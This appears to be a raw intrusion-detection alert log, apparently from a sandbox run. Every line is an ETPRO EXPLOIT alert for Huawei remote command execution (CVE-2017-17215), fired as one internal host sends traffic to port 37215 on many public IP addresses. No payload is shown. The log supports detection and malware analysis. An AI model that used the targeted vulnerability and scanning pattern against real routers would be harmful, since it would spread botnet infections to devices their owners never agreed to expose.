                                                    07/10/24-08:26:18.008254TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4900237215192.168.2.1418.45.24.163
                                                    07/10/24-08:26:34.217201TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3678837215192.168.2.1441.240.195.245
                                                    07/10/24-08:26:57.655125TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3411037215192.168.2.14197.25.5.206
                                                    07/10/24-08:27:23.782637TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4003637215192.168.2.1441.182.189.98
                                                    07/10/24-08:26:47.880980TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5592437215192.168.2.14197.15.189.78
                                                    07/10/24-08:27:24.860339TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3392837215192.168.2.1441.173.90.114
                                                    07/10/24-08:27:32.476844TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4375237215192.168.2.14197.92.156.129
                                                    07/10/24-08:26:55.428547TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5918037215192.168.2.14197.30.62.143
                                                    07/10/24-08:26:29.854453TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5992837215192.168.2.14197.96.68.77
                                                    07/10/24-08:26:49.808477TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4298237215192.168.2.14157.2.122.153
                                                    07/10/24-08:27:22.571545TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4892237215192.168.2.14144.13.202.135
                                                    07/10/24-08:26:49.770059TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4401237215192.168.2.1441.77.13.20
                                                    07/10/24-08:26:20.173422TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5152037215192.168.2.1441.81.144.208
                                                    07/10/24-08:27:23.947908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4418237215192.168.2.14197.219.221.172
                                                    07/10/24-08:26:25.514524TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4920637215192.168.2.14197.128.184.161
                                                    07/10/24-08:27:10.617343TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4216037215192.168.2.14157.105.84.149
                                                    07/10/24-08:27:17.078859TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3512637215192.168.2.14197.65.190.70
                                                    07/10/24-08:27:14.850693TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5546437215192.168.2.14197.242.76.100
                                                    07/10/24-08:26:31.106288TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4035837215192.168.2.14157.100.48.246
                                                    07/10/24-08:26:31.109229TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3561637215192.168.2.14157.126.106.94
                                                    07/10/24-08:26:57.625534TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3731437215192.168.2.14179.141.62.220
                                                    07/10/24-08:27:30.423291TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5724037215192.168.2.14157.37.16.154
                                                    07/10/24-08:26:41.617350TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4284037215192.168.2.14197.176.34.193
                                                    07/10/24-08:26:20.137908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3645637215192.168.2.1461.112.8.74
                                                    07/10/24-08:27:14.761974TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4323437215192.168.2.1441.188.234.79
                                                    07/10/24-08:27:10.679025TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3599437215192.168.2.1441.123.139.221
                                                    07/10/24-08:26:29.869473TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5729037215192.168.2.14197.23.181.195
                                                    07/10/24-08:27:03.004386TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5189437215192.168.2.14197.9.179.144
                                                    07/10/24-08:26:31.056183TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4237037215192.168.2.1441.198.159.241
                                                    07/10/24-08:26:13.767213TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5554437215192.168.2.14199.60.70.205
                                                    07/10/24-08:26:43.631742TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4239237215192.168.2.14157.197.229.177
                                                    07/10/24-08:27:14.835564TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3606437215192.168.2.14157.54.97.32
                                                    07/10/24-08:26:15.823629TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3798637215192.168.2.1441.156.45.75
                                                    07/10/24-08:26:14.826538TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3728437215192.168.2.14157.63.119.85
                                                    07/10/24-08:26:28.911510TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3641237215192.168.2.14197.71.41.225
                                                    07/10/24-08:26:55.433517TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3610437215192.168.2.1441.218.81.249
                                                    07/10/24-08:26:41.489365TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5704837215192.168.2.14125.193.57.212
                                                    07/10/24-08:26:22.264063TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3899437215192.168.2.14206.38.142.225
                                                    07/10/24-08:26:26.588414TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5030037215192.168.2.14157.10.196.147
                                                    07/10/24-08:26:49.792621TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3412437215192.168.2.14157.34.93.211
                                                    07/10/24-08:27:27.142531TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5329037215192.168.2.14171.241.72.170
                                                    07/10/24-08:27:05.216046TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5276437215192.168.2.1441.233.251.78
                                                    07/10/24-08:26:48.008673TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4814837215192.168.2.14197.22.74.219
                                                    07/10/24-08:26:49.813021TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5445637215192.168.2.14157.233.222.129
                                                    07/10/24-08:26:26.591446TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4245037215192.168.2.1441.191.140.240
                                                    07/10/24-08:27:22.492179TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4959837215192.168.2.14106.139.92.193
                                                    07/10/24-08:26:43.676361TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5811437215192.168.2.14197.2.223.162
                                                    07/10/24-08:26:14.672792TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3755237215192.168.2.14197.237.32.126
                                                    07/10/24-08:26:31.086994TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4141637215192.168.2.14197.208.10.82
                                                    07/10/24-08:26:28.931862TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4652437215192.168.2.14157.158.204.32
                                                    07/10/24-08:26:26.537875TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3934037215192.168.2.1441.30.4.41
                                                    07/10/24-08:26:43.726781TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5559837215192.168.2.14197.163.21.53
                                                    07/10/24-08:26:22.290741TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4519837215192.168.2.14157.194.96.145
                                                    07/10/24-08:26:13.671572TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5766437215192.168.2.1441.14.235.23
                                                    07/10/24-08:26:57.641730TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5824837215192.168.2.14197.213.244.159
                                                    07/10/24-08:26:59.828075TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3486037215192.168.2.14197.56.241.128
                                                    07/10/24-08:27:22.889193TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4344237215192.168.2.14157.251.171.134
                                                    07/10/24-08:26:36.327506TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4792637215192.168.2.1441.192.6.97
                                                    07/10/24-08:27:10.625884TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3302637215192.168.2.14197.57.164.150
                                                    07/10/24-08:26:29.785606TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5316237215192.168.2.14157.228.245.198
                                                    07/10/24-08:27:22.784576TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3922237215192.168.2.14119.135.59.95
                                                    07/10/24-08:26:28.937800TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3399837215192.168.2.14184.139.44.172
                                                    07/10/24-08:26:14.809601TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3364237215192.168.2.14197.184.186.128
                                                    07/10/24-08:27:28.100122TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4727437215192.168.2.14197.189.64.191
                                                    07/10/24-08:27:32.599203TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4053637215192.168.2.14157.251.237.26
                                                    07/10/24-08:26:33.165802TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5738037215192.168.2.1441.7.206.119
                                                    07/10/24-08:27:23.849464TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5661037215192.168.2.14157.171.181.45
                                                    07/10/24-08:26:11.484842TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5800837215192.168.2.145.96.24.64
                                                    07/10/24-08:27:02.872706TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3833837215192.168.2.1451.72.42.142
                                                    07/10/24-08:27:22.900850TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5639837215192.168.2.14197.18.125.214
                                                    07/10/24-08:27:19.196013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5127237215192.168.2.14197.232.61.121
                                                    07/10/24-08:27:32.553742TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5481237215192.168.2.14197.45.70.68
                                                    07/10/24-08:27:03.044130TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5220237215192.168.2.14157.161.95.221
                                                    07/10/24-08:27:19.247014TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5805437215192.168.2.14197.218.115.174
                                                    07/10/24-08:26:14.627003TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5386837215192.168.2.1441.27.9.102
                                                    07/10/24-08:26:47.867621TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3925037215192.168.2.14218.6.101.32
                                                    07/10/24-08:27:20.523161TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5020437215192.168.2.14197.228.246.80
                                                    07/10/24-08:27:20.417090TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4239037215192.168.2.14197.147.158.219
                                                    07/10/24-08:26:29.839757TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5718437215192.168.2.14157.98.33.41
                                                    07/10/24-08:26:59.643122TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5079837215192.168.2.14157.37.186.131
                                                    07/10/24-08:27:24.860339TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4550837215192.168.2.1474.191.214.75
                                                    07/10/24-08:26:25.474716TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4971637215192.168.2.14157.11.11.7
                                                    07/10/24-08:27:05.081502TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4443237215192.168.2.14104.169.105.246
                                                    07/10/24-08:26:17.998303TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5246837215192.168.2.14157.168.176.170
                                                    07/10/24-08:27:22.802348TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4114637215192.168.2.14197.122.139.161
                                                    07/10/24-08:27:17.087827TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3324437215192.168.2.1463.190.44.244
                                                    07/10/24-08:27:31.484442TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3340437215192.168.2.14157.66.99.26
                                                    07/10/24-08:27:07.350674TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5842437215192.168.2.14157.11.233.186
                                                    07/10/24-08:27:17.060305TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3646037215192.168.2.1468.73.174.107
                                                    07/10/24-08:26:20.192710TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5716237215192.168.2.1483.244.177.212
                                                    07/10/24-08:26:28.791726TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3938437215192.168.2.1441.140.84.44
                                                    07/10/24-08:26:33.217527TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6040037215192.168.2.14197.109.6.28
                                                    07/10/24-08:27:14.853963TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3981837215192.168.2.14197.207.43.24
                                                    07/10/24-08:27:02.879957TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5488437215192.168.2.1474.90.71.206
                                                    07/10/24-08:27:14.761974TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4965237215192.168.2.14157.182.64.112
                                                    07/10/24-08:27:14.761974TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4331437215192.168.2.14176.121.54.72
                                                    07/10/24-08:26:47.949660TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6025237215192.168.2.14115.219.4.26
                                                    07/10/24-08:27:05.165980TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4847437215192.168.2.14157.158.16.249
                                                    07/10/24-08:26:41.354295TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4282437215192.168.2.14197.176.197.60
                                                    07/10/24-08:26:48.010127TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4842637215192.168.2.14197.192.190.150
                                                    07/10/24-08:27:02.999181TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5881037215192.168.2.1441.39.132.14
                                                    07/10/24-08:27:19.259031TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5006437215192.168.2.1441.124.14.251
                                                    07/10/24-08:26:15.865935TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5705637215192.168.2.14197.236.115.181
                                                    07/10/24-08:26:25.492414TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4911637215192.168.2.1437.66.120.52
                                                    07/10/24-08:26:47.995601TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4087037215192.168.2.14197.41.63.43
                                                    07/10/24-08:26:11.093817TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5142837215192.168.2.14195.37.174.200
                                                    07/10/24-08:26:33.250485TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4932637215192.168.2.14197.232.63.23
                                                    07/10/24-08:27:19.336924TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5020237215192.168.2.14170.187.186.153
                                                    07/10/24-08:26:11.594883TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3721437215192.168.2.1498.112.11.193
                                                    07/10/24-08:26:22.282645TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4577037215192.168.2.1441.78.115.54
                                                    07/10/24-08:26:53.125046TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4402037215192.168.2.14154.233.156.229
                                                    07/10/24-08:26:28.729820TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4010437215192.168.2.14157.169.237.251
                                                    07/10/24-08:26:42.368823TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4703037215192.168.2.1441.173.209.29
                                                    07/10/24-08:27:23.503525TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5620237215192.168.2.1441.229.251.152
                                                    07/10/24-08:26:25.478024TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3370237215192.168.2.14184.53.187.133
                                                    07/10/24-08:26:45.648834TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5559037215192.168.2.1441.28.181.205
                                                    07/10/24-08:27:05.089807TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3428837215192.168.2.14197.250.162.101
                                                    07/10/24-08:27:33.862300TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4210437215192.168.2.1441.183.119.38
                                                    07/10/24-08:26:13.836737TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5847437215192.168.2.1441.184.150.18
                                                    07/10/24-08:27:05.072546TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3730237215192.168.2.1441.154.23.228
                                                    07/10/24-08:27:05.225360TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5103837215192.168.2.14157.229.1.145
                                                    07/10/24-08:26:43.610396TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4622037215192.168.2.1441.120.5.168
                                                    07/10/24-08:27:02.991473TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5843437215192.168.2.14197.12.22.120
                                                    07/10/24-08:27:33.825878TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4375637215192.168.2.14213.18.91.52
                                                    07/10/24-08:26:47.880979TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4543837215192.168.2.14157.201.132.158
                                                    07/10/24-08:26:57.588431TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5000237215192.168.2.14209.224.128.10
                                                    07/10/24-08:27:33.840448TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3660637215192.168.2.1441.238.136.20
                                                    07/10/24-08:26:49.755286TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5719037215192.168.2.1441.104.201.24
                                                    07/10/24-08:26:53.171769TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4571437215192.168.2.1419.22.128.42
                                                    07/10/24-08:26:31.081032TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4088237215192.168.2.1441.209.192.84
                                                    07/10/24-08:26:59.882583TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5512437215192.168.2.14197.236.54.153
                                                    07/10/24-08:26:45.603573TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4222837215192.168.2.14157.191.194.66
                                                    07/10/24-08:27:07.361334TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3881237215192.168.2.14157.74.210.0
                                                    07/10/24-08:27:10.612080TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5138637215192.168.2.14157.84.147.114
                                                    07/10/24-08:27:08.412825TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5569437215192.168.2.1441.107.53.234
                                                    07/10/24-08:27:11.480089TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5871437215192.168.2.14197.88.107.185
                                                    07/10/24-08:27:23.915755TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3585837215192.168.2.14157.211.25.61
                                                    07/10/24-08:27:32.558731TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4964437215192.168.2.14197.0.46.86
                                                    07/10/24-08:26:34.191107TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3809437215192.168.2.1441.87.142.162
                                                    07/10/24-08:26:49.796978TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6061437215192.168.2.1441.156.83.91
                                                    07/10/24-08:26:49.842206TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5547237215192.168.2.1441.155.255.255
                                                    07/10/24-08:27:31.488835TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4278037215192.168.2.14157.20.20.17
                                                    07/10/24-08:26:49.865409TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5713037215192.168.2.1441.177.32.22
                                                    07/10/24-08:26:38.641366TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5147837215192.168.2.14157.214.17.215
                                                    07/10/24-08:27:22.773467TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3768437215192.168.2.14157.244.183.48
                                                    07/10/24-08:26:22.209448TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5542637215192.168.2.14157.179.103.239
                                                    07/10/24-08:26:49.832032TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3385037215192.168.2.149.99.118.92
                                                    07/10/24-08:26:20.139593TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4065037215192.168.2.14197.193.98.245
                                                    07/10/24-08:26:36.349242TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4444037215192.168.2.14197.22.81.154
                                                    07/10/24-08:27:22.472929TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5578437215192.168.2.14157.219.162.22
                                                    07/10/24-08:27:22.813779TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5434037215192.168.2.14197.160.0.87
                                                    07/10/24-08:26:36.348992TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5930837215192.168.2.14197.69.139.254
                                                    07/10/24-08:26:49.900160TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5973637215192.168.2.14157.140.116.189
                                                    07/10/24-08:26:59.790586TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5828837215192.168.2.1471.152.13.93
                                                    07/10/24-08:26:38.518951TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5964037215192.168.2.14194.65.3.250
                                                    07/10/24-08:27:22.913704TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4650237215192.168.2.1439.146.153.149
                                                    07/10/24-08:26:22.285937TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3519637215192.168.2.14205.185.108.151
                                                    07/10/24-08:26:34.184819TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5579637215192.168.2.14197.222.163.22
                                                    07/10/24-08:26:31.065728TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4398437215192.168.2.14157.31.76.8
                                                    07/10/24-08:26:59.572693TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4802437215192.168.2.14157.174.11.107
                                                    07/10/24-08:27:10.674109TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4946237215192.168.2.14126.84.86.69
                                                    07/10/24-08:27:24.938068TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3438837215192.168.2.14109.206.208.206
                                                    07/10/24-08:27:10.554051TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4822237215192.168.2.14197.45.231.59
                                                    07/10/24-08:26:41.476455TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5406637215192.168.2.14197.253.79.215
                                                    07/10/24-08:26:51.995673TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5392437215192.168.2.14197.128.150.54
                                                    07/10/24-08:27:13.721350TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5875437215192.168.2.1441.212.146.219
                                                    07/10/24-08:27:13.821623TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4458037215192.168.2.14157.201.185.247
                                                    07/10/24-08:27:02.716869TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4006637215192.168.2.14191.63.111.20
                                                    07/10/24-08:27:23.962795TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5296837215192.168.2.14197.35.11.95
                                                    07/10/24-08:26:43.867086TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5214237215192.168.2.14157.131.131.14
                                                    07/10/24-08:27:05.081710TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4207237215192.168.2.14197.79.254.39
                                                    07/10/24-08:26:36.392573TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3761437215192.168.2.14206.240.196.251
                                                    07/10/24-08:27:28.062110TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3663037215192.168.2.14157.160.74.159
                                                    07/10/24-08:26:45.603298TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3842837215192.168.2.1441.17.174.54
                                                    07/10/24-08:27:02.702659TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4056037215192.168.2.14197.107.29.117
                                                    07/10/24-08:26:13.851676TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4168237215192.168.2.1441.116.87.18
                                                    07/10/24-08:27:31.555848TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4829437215192.168.2.14157.5.178.82
                                                    07/10/24-08:26:18.008253TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3549837215192.168.2.14197.47.104.236
                                                    07/10/24-08:26:14.814153TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5355637215192.168.2.1431.122.229.114
                                                    07/10/24-08:26:38.569394TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4350037215192.168.2.14157.96.164.114
                                                    07/10/24-08:26:20.191399TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5661237215192.168.2.1441.29.15.155
                                                    07/10/24-08:26:55.406930TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5624037215192.168.2.14197.181.38.169
                                                    07/10/24-08:26:28.777569TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4370837215192.168.2.14188.214.117.245
                                                    07/10/24-08:26:18.015833TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5006437215192.168.2.14197.245.208.165
                                                    07/10/24-08:27:27.142415TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4125237215192.168.2.14101.63.109.65
                                                    07/10/24-08:26:57.520165TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5683237215192.168.2.14157.91.26.213
